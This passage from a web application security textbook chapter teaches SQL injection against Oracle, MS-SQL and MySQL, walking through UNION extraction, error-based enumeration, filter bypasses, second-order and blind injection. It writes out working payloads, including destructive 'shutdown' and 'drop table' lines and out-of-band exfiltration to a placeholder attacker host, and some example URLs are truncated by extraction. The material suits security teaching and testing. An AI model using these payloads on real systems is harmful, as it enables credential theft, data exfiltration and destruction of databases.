Chapter 9 ■ Injecting Code 257

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 257

We target the second column, and this is successful, returning a row of data

containing the input we specified:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,

’a’,NULL,NULL%20from%20dual--

ID EMPLOYEE JOB

7521 WARD SALESMAN

We now have a means of extracting string data from the database. Our next

step is to find out the names of the database tables that may contain interest-

ing information. We can do this by querying the

user_objects table, which

displays details of user-defined tables and other items:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,

object_name,object_type,NULL%20from%20user_objects--

ID EMPLOYEE JOB

7521 WARD SALESMAN

BONUS TABLE

DEPT TABLE

EMP TABLE

EMP_GETDATA PROCEDURE

EMP_TABLE SYNONYM

GETEMP PROCEDURE

HIGHSCORE TABLE

PK_DEPT INDEX

PK_EMP INDEX

REMOTE.US.ORACLE.COM DATABASE LINK

REMOTE.WARGAMES DATABASE LINK

SALGRADE TABLE

SCANAPORT PROCEDURE

TEST123.WARGAMES DATABASE LINK

USERS TABLE

258 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 258

NOTE Here we have queried the user_objects table, which returns all the

objects owned by the web application’s database user. You can also query

all_user_objects, which will return all of the objects that are visible by that

user, even if not owned by it.

Many of these tables may contain sensitive data, including information

about employees that we cannot legitimately access given our privilege level.

An obvious point of initial attack is the table called

USERS, which may contain

credentials. We can discover the names of the columns within this table by

querying the

user_tab_columns table:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,

column_name,NULL,NULL%20from%20user_tab_columns%20where%20table_name%20%

3d%20’USERS’--

ID EMPLOYEE JOB

7521 WARD SALESMAN

PASSWORD

PRIVILEGE

SESSIONID

WORD

This output confirms that the USERS table does indeed contain sensitive

data, including passwords and session tokens. We now have everything we

need to extract any of this information. For example:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,

ID EMPLOYEE JOB

7521 WARD SALESMAN

admin 0wned

marcus marcus1

Chapter 9 ■ Injecting Code 259

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 259

TIP In the attack just described, there are two columns available for retrieving

data, and the easiest exploit is to use both. If only one field were available, the

same attack could be carried out by concatenating multiple items of extracted

data into a single field. For example, the following URL would retrieve

usernames and passwords within just the Employee field, separated by a colon:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,

An MS-SQL Hack

Let’s take a look at a similar attack being performed against an MS-SQL data-

base. Consider a retailing application that allows users to search a product cat-

alog. A typical search uses the following URL:

https://wahh-app.com/products.asp?q=hub

This search returns the following results:

PRODUCT PRICE

Netgear Hub (4-port) £30

Netgear Hub (8-port) £40

First, we need to determine the required number of columns. Testing for a

single column results in an error message:

https://wahh-app.com/products.asp?q=hub’%20union%20select%20null--

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL

statement containing a UNION operator must have an equal number of

expressions in their target lists.

We add a second NULL, and our query is executed, generating an additional

item in the results table:

https://wahh-app.com/products.asp?q=hub’%20union%20select%20null,null--

PRODUCT PRICE

Netgear Hub (4-port) £30

Netgear Hub (8-port) £40

260 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 260

We now verify that the first column in the query contains string data:

https://wahh-app.com/products.asp?q=hub’%20union%20select%20’a’,null--

PRODUCT PRICE

Netgear Hub (4-port) £30

Netgear Hub (8-port) £40

Our next step is to find out the names of the database tables that may con-

tain interesting information. We can do this by querying the

sysobjects table,

which contains details of all objects within the database. To retrieve only the

user-defined objects, we specify the type

https://wahh-app.com/products.asp?q=hub’%20union%20select%20name,

null%20from%20sysobjects%20where%20xtype%3d’U’--

PRODUCT PRICE

Netgear Hub (4-port) £30

Netgear Hub (8-port) £40

Dtproperties

Messages

pending_requests

Products

Searchorders

session_ids

Supercomputer

Users

users_session

users_session_passwords

Again here, the Users table is an obvious place to begin extracting data. To

discover the names of columns within the

users table, we can query the

syscolumns table:

https://wahh-app.com/products.asp?q=hub’%20UNION%20select%20b.name,null%

20from%20sysobjects%20a,syscolumns%20b%20where%20a.id=b.id%20and%

20a.name%3d’users’--

Chapter 9 ■ Injecting Code 261

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 261

PRODUCT PRICE

Netgear Hub (4-port) £30

Netgear Hub (8-port) £40

Password

Privilege

Sessionid

Uid

Word

We now have everything we need to extract the information within the

Users table. For example:

https://wahh-app.com/products.asp?q=hub’%20UNION%20select%20login,

password%20from%20users--

PRODUCT PRICE

Netgear Hub (4-port) £30

Netgear Hub (8-port) £40

admin 0wned

dev n0ne

marcus marcus1

smith r00tr0x

testuser password

TIP As with the Oracle hack, the usernames and password could be retrieved

into a single column using the + concatenator (encoded as %2b):

https://wahh-app.com/products.asp?q=hub’%20UNION%20select%20login%2b’:

’%2bpassword,null%20from%20users--

Exploiting ODBC Error Messages (MS-SQL Only)

If you are attacking an MS-SQL database, then there are alternative ways avail-

able of discovering the names of database tables and columns, and of extract-

ing useful data. MS-SQL generates extremely verbose error messages, which

262 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 262

can be exploited in various ways. The techniques described here were first dis-

covered by David Litchfield and Chris Anley in the course of a penetration

test, and are described in detail in several whitepapers by them.

Enumerating Table and Column Names

Recall the login function described earlier, which performs the following

SQL query, in which the username and password fields are vulnerable to SQL

injection:

SELECT * FROM users WHERE username = ‘marcus’ and password = ‘secret’

Although you can bypass the login by injecting into either of these fields, if

you wish to exploit the vulnerability to extract or modify sensitive data, then

you will need to know the names of the table and columns involved. Suppose

that the table being queried was originally created using the command

create table users( ID int, username varchar(255), password

varchar(255), privs int)

If ODBC error messages are being returned to your browser, then you can

trivially obtain all of this information about the table. The first step is to inject

the following string into one of the vulnerable fields:

‘ having 1=1--

This generates the following error message:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’

[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘users.ID’ is

invalid in the select list because it is not contained in an aggregate

function and there is no GROUP BY clause.

Embedded in this error message is the item users.ID, which in fact dis-

closes the name of the table being queried (

users) and the name of the first col-

umn being returned by the query (

ID). The next step is to insert the

enumerated column name into the attack string, which produces this:

‘ group by users.ID having 1=1--

Submitting this value generates the following error message:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’

[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘users.username’

is invalid in the select list because it is not contained in either an

aggregate function or the GROUP BY clause.

Chapter 9 ■ Injecting Code 263

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 263

This message discloses the name of the second column being returned by

the query. You can continue inserting the name of each enumerated column

into the attack string, eventually arriving at the following attack string:

‘ group by users.ID, users.username, users.password, users.privs having

1=1--

Submitting this value does not result in any error message. This confirms

that you have now enumerated all of the columns being returned by the query,

and the order in which they appear.

The next step is to determine the data types of each column. Using the infor-

mation already obtained, you can supply the following input:

‘ union select sum(username) from users--

This input attempts to perform a second query and combine the results with

those of the original. It generates the following error message:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average

aggregate operation cannot take a varchar data type as an argument.

This error occurs because the database carried out the injected query before

attempting to combine the results with those of the original. The

SUM function

performs a numeric sum, and takes numeric type data as its input. Because the

username column is a string type, this causes an error, and the message dis-

closes that the username column is of the specific data type

varchar.

Submitting the same input with the

ID column produces a different error

message:

‘ union select sum(ID) from users--

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL

statement containing a UNION operator must have an equal number of

expressions in their target lists.

This error indicates that the SUM function was successful, and a problem

arose at the point where the database attempted to combine the single column

returned by the injected query with the four columns returned by the original

query. This effectively confirms that the

ID column is a numeric data type.

You can repeat this test on each of the fields of the query to confirm their

data types. Having done this, you now have sufficient information to extract

arbitrary information from the

users table, and to insert your own data into it.

For example, to add a new user account with arbitrary

ID and privs values,

you can submit the following as either of the vulnerable fields:

‘; insert into users values( 666, ‘attacker’, ‘foobar’, 0xffff )--

264 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 264

NOTE MS-SQL allows multiple separate SQL queries to be batched together,

optionally using a semicolon character as a separator. This enables you to carry

out an entirely separate statement, even using a different verb, via any SQL

injection vulnerability where the database is MS-SQL.

Extracting Arbitrary Data

One particularly useful ODBC error message occurs when the database

attempts to cast an item of string data to a numeric data type. In this situation,

the error message generated actually contains the value of the string item that

caused the problem. If error messages are being returned to the browser, this

behavior can be a gold mine to an attacker because it allows arbitrary string

data to be returned reliably.

It is possible to inject into the

WHERE clause of a SELECT statement in such a

way as to perform an arbitrary second query and trigger a failed string con-

version on the result. One way of doing this is as follows, which in this exam-

ple returns version information about the database and operating system:

‘ or 1 in (select @@version)--

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the nvarchar value ‘Microsoft SQL Server 2000 - 8.00.194 (Intel X86)

Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ‘

to a column of data type int.

More interestingly, given the information already gathered, you could

retrieve the password of the admin user as follows:

‘ or 1 in (select password from users where username=’admin’)--

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the varchar value ‘0wned’ to a column of data type int.

TIP There are other ways of causing the database to attempt to convert a

string value to a numeric data type:

■■

You can attempt to “add” a string to a numeric value—for example,

1+@@version. Because this expression begins with a number, the

database interprets the + sign as addition rather than concatenation,

and so attempts to cast each subsequent term to a numeric type.

■■

You can use the function CAST to mandate any particular cast, for

example: SELECT CAST(@@version AS int).

Chapter 9 ■ Injecting Code 265

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 265

Using Recursion

Suppose that you wish to extract all of the usernames and passwords in the

users table. Using the previous extraction technique, you can obtain only a

single item of string data at a time. One way to circumvent this restriction is to

craft a query that takes the previous result as its input and returns the next

result as its output. Issuing these queries recursively will enable you to cycle

through each of the items of data which you wish to extract.

For example, supplying the following input returns an error message con-

taining the username that appears alphabetically first in the

users table:

‘ or 1 in (select min(username) from users where username > ‘a’)--

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the varchar value ‘aaron’ to a column of data type int.

Having established the username aaron, you can insert this into the next

query as follows:

‘ or 1 in (select min(username) from users where username > ‘aaron’)--

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the varchar value ‘abbey’ to a column of data type int.

You can continue this process recursively until no further usernames are

returned. Having saved a list of these usernames, you can then use them to

retrieve the corresponding passwords directly, as in the earlier example.

TIP You can use the Recursive Grep payload type in Burp Intruder to

automate this attack. To do this, you need to configure the Extract Grep

function to use the following trigger to capture the string data returned in the

error message:

varchar value ‘

You then need to set a single payload position to insert each captured string at

the appropriate point in your injected query, and set the initial payload to a.

The captured values will be displayed in a column of the results table, and you

should let the attack continue until no further items are returned.

266 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 266

Bypassing Filters

In some situations, an application that is vulnerable to SQL injection may

implement various input filters that prevent you from exploiting the flaw

without restrictions. For example, the application may remove or sanitize cer-

tain characters, or may block common SQL keywords. Filters of this kind are

often vulnerable to bypasses, and there are numerous tricks that you should

try in this situation.

Avoiding Blocked Characters

If the application removes or encodes some characters that are often used in

SQL injection attacks, you may still be able to perform an attack without these:

■■

The single quotation mark is not required if you are injecting into a

numeric data field.

■■

If the comment symbol is blocked, you can often craft your injected

data such that it does not break the syntax of the surrounding query,

even without using this. For example, instead of injecting

‘ or 1=1--

you can inject

‘ or ‘a’=’a

■■

When attempting to inject batched queries into an MS-SQL database,

you do not need to use the semicolon separator. Provided you fix up

the syntax of all queries in the batch, the query parser will interpret

them correctly regardless of whether or not you include a semicolon.

Circumventing Simple Validation

Some input validation routines employ a simple blacklist, and either block or

remove any supplied data which appears on this list. In this instance, you

should try the standard attacks looking for common defects in validation and

canonicalization mechanisms. For example, if the

SELECT keyword is being

blocked or removed, you can try the following bypasses:

SeLeCt

SELSELECTECT

%53%45%4c%45%43%54

%2553%2545%254c%2545%2543%2554

Chapter 9 ■ Injecting Code 267

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 267

Using SQL Comments

Inline comments can be inserted into SQL statements in the same way as for

C++, by embedding them between the symbols

/* and */. If the application

blocks or strips spaces from your input, you can use comments to simulate

whitespace within your injected data. For example:

SELECT/*foo*/username,password/*foo*/FROM/*foo*/users

In MySQL, comments can even be inserted within keywords themselves,

which provides another means of bypassing some input validation filters

while preserving the syntax of the actual query. For example:

SEL/*foo*/ECT username,password FR/*foo*/OM users

Manipulating Blocked Strings

If the application blocks certain strings that you wish to place as data items

within an injected query, then the required string can be constructed dynami-

cally using various string manipulation functions. For example, if the expres-

sion

admin is being blocked, then you can build this in the following ways:

■■

Oracle: ‘adm’||’in’

■■

MS-SQL: ‘adm’+’in’

■■

MySQL: concat(‘adm’,’in’)

Most databases contain many custom functions for string manipulation that

can be used to construct blocked strings in arbitrarily complex ways, in order

to circumvent different input validation filters. For example, Oracle contains

the functions

CHR, REVERSE, TRANSLATE, REPLACE, and SUBSTR. A function like

CHR can be used to introduce a literal string in cases where single quotation

marks are being blocked. For example, the following query effectively smug-

gles in the string

admin:

SELECT password from users where username = chr(97) || chr(100) ||

chr(109) || chr(105) || chr(110)

Using Dynamic Execution

Some databases provide a means of executing SQL statements dynamically, by

passing a string representation of a particular statement to the relevant func-

tion. For example, in MS-SQL you can use the following:

exec(‘select * from users’)

268 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 268

This enables you to employ any of the string manipulation techniques

described previously anywhere within the statement to bypass filters designed

to block certain expressions. For example:

exec(‘sel’ + ‘ect * from ‘ + ‘users’)

You can also create a string from hex-encoded numeric data, and then pass

this string to the

exec function, enabling you to bypass many kinds of input fil-

ter, including the blocking of single quotation marks, for example:

declare @q varchar(8000)

select @q = 0x73656c656374202a2066726f6d207573657273

exec(@q)

In Oracle, you can use EXECUTE IMMEDIATE to execute a query that is repre-

sented as a string. For example:

declare

l_cnt varchar2(20);

begin

execute immediate ‘sel’||’ect * fr’||’om_users’

into l_cnt;

dbms_output.put_line(l_cnt);

end;

Exploiting Defective Filters

It is very common for applications to seek to defend themselves against SQL

injection by escaping any single quotation marks that appear within string-

based user input (and rejecting any that appear within numeric input). As you

have seen, two single quotation marks together are an escape sequence that

represents one literal single quote, which the database will interpret as data

within a quoted string rather than the closing string terminator. Many devel-

opers reason, therefore, that by doubling up any single quotation marks

within user-supplied input, they will prevent any SQL injection attacks from

occurring.

In addition to doubling up quotation marks, some applications perform

other operations in an effort to sanitize potentially malicious input. In this sit-

uation, it may be possible to exploit the ordering of these steps to bypass the

filter, as described in Chapter 2.

Recall the vulnerable login example. Suppose that the application doubles

up any single quotation marks contained in user input, and also then imposes

a length limit on the data, truncating it to 20 characters. Supplying the

username

admin’--

Chapter 9 ■ Injecting Code 269

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 269

now results in the following query, which fails to bypass the login:

SELECT * FROM users WHERE username = ‘admin’‘--‘ and password = ‘’

However, if you submit the following username (containing 19 a’s and one

single quotation mark):

aaaaaaaaaaaaaaaaaaa’

then the application first doubles up the single quotation mark, and then trun-

cates the string to 20 characters, returning your input to its original value. This

results in a database error, because you have injected an additional single quo-

tation mark into the query without fixing up the surrounding syntax. If you

now also supply the password

[space]

or 1=1--

the application performs the following query, which succeeds in bypassing the

SELECT * FROM users WHERE username = ‘aaaaaaaaaaaaaaaaaaa’‘ and password

= ‘ or 1=1--‘

The doubled-up quotation mark at the end of the string of a’s is interpreted

as an escaped quotation mark and, therefore, as part of the query data. This

string effectively continues as far as the next single quotation mark, which in

the original query marked the start of the user-supplied password value. The

actual username understood by the database will, thus, be the literal string

data shown here:

aaaaaaaaaaaaaaaaaaa’ and password =

Hence, whatever comes next will be interpreted as part of the query itself

and can be crafted to interfere with the query logic.

TIP You can test for this type of vulnerability without knowing exactly what

length limit is being imposed by submitting in turn two long strings of the

following form:

‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘ etc.

a’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘’‘ etc.

and determining whether an error occurs. Any truncation of escaped input will

either occur after an even number or an odd number of characters. Whichever

possibility is the case, one of the preceding strings will result in an odd number

of single quotation marks being inserted into the query, resulting in invalid

syntax.

270 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 270

Second-Order SQL Injection

A particularly interesting type of filter bypass arises in connection with second-

order SQL injection. As described earlier, it is very common for applications to

seek to defend themselves against SQL injection by escaping any single quota-

tion marks that appear within string-based user input (and rejecting any that

appear within numeric input). Even when this approach is not vulnerable in

the ways already described, it can sometimes be bypassed.

In the original book search example, this approach appears to be effective.

When the user enters the search term

O’Reilly, the application makes the fol-

lowing query:

SELECT author,title,year FROM books WHERE publisher = ‘O’‘Reilly’

Here, the single quotation mark supplied by the user has been converted

into two single quotation marks, and so the item passed to the database has the

same literal significance as the original expression entered by the user.

One problem with the doubling-up approach arises in more complex situa-

tions where the same item of data passes through several SQL queries, being

written to the database and then read back more than once. This is one exam-

ple of the shortcomings of simple input validation as opposed to boundary vali-

dation, as described in Chapter 2.

Recall the application that allowed users to self-register and contained a

SQL injection flaw in an

INSERT statement. Suppose that developers attempt to

fix the vulnerability by doubling up any single quotation marks which appear

within user data. Attempting to register the username

foo’ results in the fol-

lowing query, which causes no problems for the database:

INSERT INTO users (username, password, ID, privs) VALUES (‘foo’‘’,

‘secret’, 2248, 1)

So far, so good. However, suppose that the application also implements a pass-

word change function. This function is only reachable by authenticated users, but

for extra protection, the application requires users to submit their old password.

It then verifies that this is correct by retrieving the user’s current password from

the database and comparing the two strings. To do this, it first retrieves the user’s

username from the database and then constructs the following query:

SELECT password FROM users WHERE username = ‘foo’‘

Because the username stored in the database is the literal string foo’, this is

the value that the database returns when this value is queried — the doubled-

up escape sequence is only used at the point where strings are passed into the

database. Therefore, when the application reuses this string and embeds it into

a second query, a SQL injection flaw arises and the user’s original bad input is

Chapter 9 ■ Injecting Code 271

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 271

embedded directly into the query. When the user attempts to change the pass-

word, the application returns the following message, which reveals the flaw:

Unclosed quotation mark before the character string ‘foo

To exploit this vulnerability, an attacker can simply register a username con-

taining his crafted input, and then attempt to change his password. For exam-

ple, if the following username is registered:

‘ or 1 in (select password from users where username=’admin’)--

then the registration step itself will be handled securely. When the attacker

tries to change his password, his injected query will be executed, resulting in

the following message, which discloses the admin user’s password:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the varchar value ‘fme69’ to a column of data type int.

The attacker has successfully bypassed the input validation that was

designed to block SQL injection attacks, and now has a means of executing

arbitrary queries within the database and retrieving the results.

Advanced Exploitation

In all of the attacks described so far, there has been a ready means of retrieving

any useful data that was extracted from the database — for example, by per-

forming a

UNION attack or returning data in an error message. As awareness of

SQL injection threats has evolved, this kind of situation has become gradually

less common. It is increasingly the case that the SQL injection flaws that you

encounter will be in situations where retrieving the results of your injected

queries is not straightforward. We shall look at several ways in which this

problem can arise, and can be dealt with.

NOTE Application owners should be aware that not every attacker is

interested in stealing sensitive data. Some may be more destructive — for

example, by supplying just 12 characters of input, an attacker could turn off an

MS-SQL database with the shutdown command:

‘ shutdown--

An attacker could also inject malicious commands to drop individual tables

with commands such as these:

‘ drop table users--

‘ drop table accounts--

‘ drop table customers--

272 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 272

Retrieving Data as Numbers

It is fairly common to find that no string fields within an application are vul-

nerable to SQL injection, because input containing single quotation marks is

being properly handled. However, vulnerabilities may still exist within

numeric data fields, where user input is not encapsulated within single quotes.

Often in these situations, the only means of retrieving the results of your

injected queries is via a numeric response from the application.

In this situation, your challenge is to process the results of your injected

queries in such a way that meaningful data can be retrieved in numeric form.

There are two key functions that can be used here:

■■

ASCII, which returns the ASCII code for the input character.

■■

SUBSTRING (or SUBSTR in Oracle), which returns a substring of its input.

These functions can be used together to extract a single character from a

string, in numeric form. For example:

SUBSTRING(‘Admin’,1,1) returns A

ASCII(‘A’)

returns 65

Therefore:

ASCII(SUBSTR(‘Admin’,1,1)) returns 65

Using these two functions, you can systematically cut up a string of useful

data into its individual characters, and return each of these separately, in

numeric form. In a scripted attack, this technique can be used to quickly

retrieve and reconstruct a large amount of string-based data, one byte at a

time.

TIP There are numerous subtle variations in the way different database

platforms handle string manipulation and numeric computation, which you may

need to take account of when performing advanced attacks of this kind. An

excellent guide to these differences covering many different databases can be

found here:

http://sqlzoo.net/howto/source/z.dir/i08fun.xml

In a variation on this situation, the authors have encountered cases in which

what is returned by the application is not an actual number, but some resource

for which that number is an identifier. The application performs a SQL query

based on user input, obtains a numeric identifier for a document, and then

returns the document’s contents to the user. In this situation, an attacker can

first obtain a copy of every document whose identifiers are within the relevant

Chapter 9 ■ Injecting Code 273

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 273

numeric range and construct a mapping of document contents to identifiers.

Then, when performing the attack described previously, the attacker can con-

sult this map to determine the identifier for each document received from the

application, and thereby retrieve the ASCII value of the character that they

have successfully extracted.

Using an Out-of-Band Channel

In many cases of SQL injection, the application does not return the results of

any injected query to the user’s browser, nor does it return any error messages

generated by the database. In this situation, it may appear that your position is

futile: even if a SQL injection flaw exists, it surely cannot be exploited to extract

arbitrary data or perform any other action. This appearance is false, however,

and there are various techniques that you can use to retrieve data, and verify

that other malicious actions have been successful.

There are many circumstances in which you may be able to inject an arbi-

trary query but not retrieve its results. Recall the example of the vulnerable

injection:

SELECT * FROM users WHERE username = ‘marcus’ and password = ‘secret’

In addition to modifying the logic of the query to bypass the login, you can

inject an entirely separate subquery using string concatenation to join its

results to the item you control. For example:

foo’ || (SELECT 1 FROM dual WHERE (SELECT username FROM all_users WHERE

username = ‘DBSNMP’) = ‘DBSNMP’)--

This will cause the application to perform the following query:

SELECT * FROM users WHERE username = ‘foo’ || (SELECT 1 FROM dual WHERE

(SELECT username FROM all_users WHERE username = ‘DBSNMP’) = ‘DBSNMP’)

The database will execute your arbitrary subquery, append its results to foo

and then look up the details of the resulting username. Of course, the login

will fail, but your injected query will have been executed. All you will receive

back in the application’s response is the standard login failure message. What

you then need is a means of retrieving the results of your injected query.

A different situation arises when you are able to employ batch queries

against MS-SQL databases. Batch queries are extremely useful, because they

allow you to execute an entirely separate statement over which you have full

control, using a different SQL verb and targeting a different table. However,

because of the way batch queries are carried out, the results of an injected

274 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 274

query cannot be directly retrieved. Again, you need a means of retrieving the

lost results of your injected query.

One method for retrieving data that is often effective in this situation is to

use an out-of-band channel. Having achieved the ability to execute arbitrary

SQL statements within the database, it is often possible to leverage some of the

database’s built-in functionality to create a network connection back to your

own computer, over which you can transmit arbitrary data that you have gath-

ered from the database.

The means of creating a suitable network connection are highly database-

dependent, and different methods may or may not be available given the priv-

ilege level of the database user with which the application is accessing the

database. Some of the most common and effective techniques for each type of

database are described here.

MS-SQL

The OpenRowSet command can be used to open a connection to an external

database and insert arbitrary data into it. For example, the following query

will cause the target database to open a connection to the attacker’s database

and insert the version string of the target database into the table called

foo:

insert into openrowset(‘SQLOLEDB’,

‘DRIVER={SQL Server};SERVER=wahh-attacker.com,80;UID=sa;PWD=letmein’,

‘select * from foo’) values (@@version)

Note that you can specify port 80, or any other likely value, to increase your

chance of making an outbound connection through any firewalls.

Oracle

Oracle contains a large amount of default functionality that is accessible by

low-privileged users and can be used to create an out-of-band connection.

The

UTL_HTTP package can be used to make arbitrary HTTP requests to other

hosts.

UTL_HTTP contains rich functionality and supports proxy servers, cook-

ies, redirects, and authentication. This means that an attacker who has com-

promised a database on a highly restricted internal corporate network may be

able to leverage a corporate proxy to initiate outbound connections to the

Internet.

In the following example,

UTL_HTTP is used to transmit the results of an

injected query to a server controlled by the attacker:

https://wahh-app.com/employees.asp?EmpNo=7521’||UTL_HTTP.request

(‘wahh-attacker.com:80/‘||(SELECT%20username%20FROM%20all_

users%20WHERE%20ROWNUM%3d1))--

Chapter 9 ■ Injecting Code 275

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 275

This URL causes UTL_HTTP to make a GET request for a URL containing the

first username in the table

all_users. The attacker can simply set up a netcat

listener on

wahh-attacker.com to receive the result:

C:\>nc -nLp 80

GET /SYS HTTP/1.1

Host: wahh-attacker.com

Connection: close

The UTL_INADDR package is designed to be used to resolve host names to IP

addresses. It can be used to generate arbitrary DNS queries to a server con-

trolled by the attacker. In many situations, this is more likely to succeed than

the

UTL_HTTP attack because DNS traffic is often allowed out through corpo-

rate firewalls even when HTTP traffic is restricted. The attacker can leverage

this package to perform a lookup on a hostname of their choice, effectively

retrieving arbitrary data by prepending it as a subdomain to a domain name

that they control, for example:

https://wahh-app.com/employees.asp?EmpNo=7521’||UTL_INADDR.GET_HOST_

NAME((SELECT%20PASSWORD%20FROM%20DBA_USERS%20WHERE%20USERNAME=’SYS’)||’.

wahh-attacker.com’)

This results in a DNS query to the wahh-attacker.com name server contain-

ing the

SYS user’s password hash:

DCB748A5BC5390F2.wahh-attacker.com

The UTL_SMTP package can be used to send emails. This facility can be used

to retrieve large volumes of data captured from the database by sending this in

outbound emails.

The

UTL_TCP package can be used to open arbitrary TCP sockets to send and

receive network data.

MySQL

The SELECT ... INTO OUTFILE command can be used to direct the output from

an arbitrary query into a file. The specified filename may contain a UNC path,

enabling you to direct the output to a file on your own computer. For example:

select * into outfile ‘\\\\attacker\\share\\output.txt’ from users;

To receive the file, you will need to create an SMB share on your computer

that allows anonymous write access. You can configure shares on both Win-

dows and Unix-based platforms to behave in this way. If you have difficulty

receiving the exported file, this may well result from a configuration issue in

your SMB server. You can use a sniffer to confirm whether the target server is

276 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 276

initiating any inbound connections to your computer, and if so, consult your

server documentation to ensure it is correctly configured.

Leveraging the Operating System

It is often possible to perform escalation attacks via the database that result in

execution of arbitrary commands on the operating system of the database

server itself. In this situation, there are many more avenues available to you for

retrieval of data, such as using built-in commands like

tftp, mail, and telnet,

or copying data into the web root for retrieval using a browser. See the later

section “Beyond SQL Injection” for techniques for escalating privileges on the

database itself.

Using Inference: Conditional Responses

There are many reasons why an out-of-band channel may not be available —

most commonly, because the database is located within a protected network

whose perimeter firewalls do not allow any outbound connections to the Inter-

net or any other network. In this situation, you are restricted to accessing the

database entirely via your injection point into the web application.

In this situation, working more or less blind, there are still techniques you

can use to retrieve arbitrary data from within the database. These techniques

are all based upon the concept of using an injected query to conditionally trig-

ger some detectable behavior by the database and then inferring a required

item of information on the basis of whether this behavior occurs.

This topic is a thriving area of current research into web application attack

techniques, and we will examine the very latest methods that have been

devised at the time of this writing.

Recall the vulnerable login function where the username and password

fields can be injected into to perform arbitrary queries:

SELECT * FROM users WHERE username = ‘marcus’ and password = ‘secret’

Suppose that you have not identified any method of transmitting the results

of your injected queries back to the browser. Nevertheless, you have already

seen how you can use SQL injection to modify the application’s behavior. For

example, submitting the following two pieces of input will cause very differ-

ent results:

admin’ AND 1=1--

admin’ AND 1=2--

Chapter 9 ■ Injecting Code 277

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 277

In the first case, the application will log you in as the admin user. In the sec-

ond case, the login attempt will fail, because the

1=2 condition is always false.

You can leverage this control of the application’s behavior as a means of infer-

ring the truth or falsehood of arbitrary conditions within the database itself.

For example, using the

ASCII and SUBSTRING functions described previously,

you can test whether a specific character of a captured string has a specific

value. For example, submitting this piece of input will log you in as the admin

user, because the condition tested is true:

admin’ AND ASCII(SUBSTRING(‘Admin’,1,1)) = 65--

Submitting the following input, however, will result in a failed login,

because the condition tested is false:

admin’ AND ASCII(SUBSTRING(‘Admin’,1,1)) = 66--

By submitting a large number of such queries, cycling through the range of

likely ASCII codes for each character until a hit occurs, you can extract the

entire string, one byte at a time.

Absinthe

Performing this inference-based attack manually would be extremely tedious

and time-consuming, requiring numerous requests for every single byte of

retrieved data. Fortunately, there are various ways in which you can automate

and parallelize the attack, to extract a large amount of information in a rela-

tively short period of time. An excellent tool that you can use to perform this

task is Absinthe.

Absinthe is not a point-and-click tool. To use it effectively, you need to fully

understand the SQL injection flaw you are exploiting, and have reached the

point where you can supply crafted input that affects the application’s

response in some detectable way.

The first step is to configure Absinthe with all the information required to

perform the attack. This includes:

■■

The URL and request method.

■■

The type of database being targeted, so that Absinthe can retrieve the

relevant meta-information once the attack is underway.

■■

The parameters to the request, and whether each is injectable.

■■

Any further options to fine-tune the attack. If necessary, Absinthe can

append a specified string at the end of each injected payload and can

add the comment character, to ensure that the resulting modified query

is syntactically valid.

278 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 278

A typical configuration is shown in Figure 9-1.

Figure 9-1: A typical Absinthe configuration

The next step is to click the Initialize Injection option. This causes Absinthe

to issue two test requests, designed to trigger different application responses.

As described in the previous attack, Absinthe injects the following two

payloads:

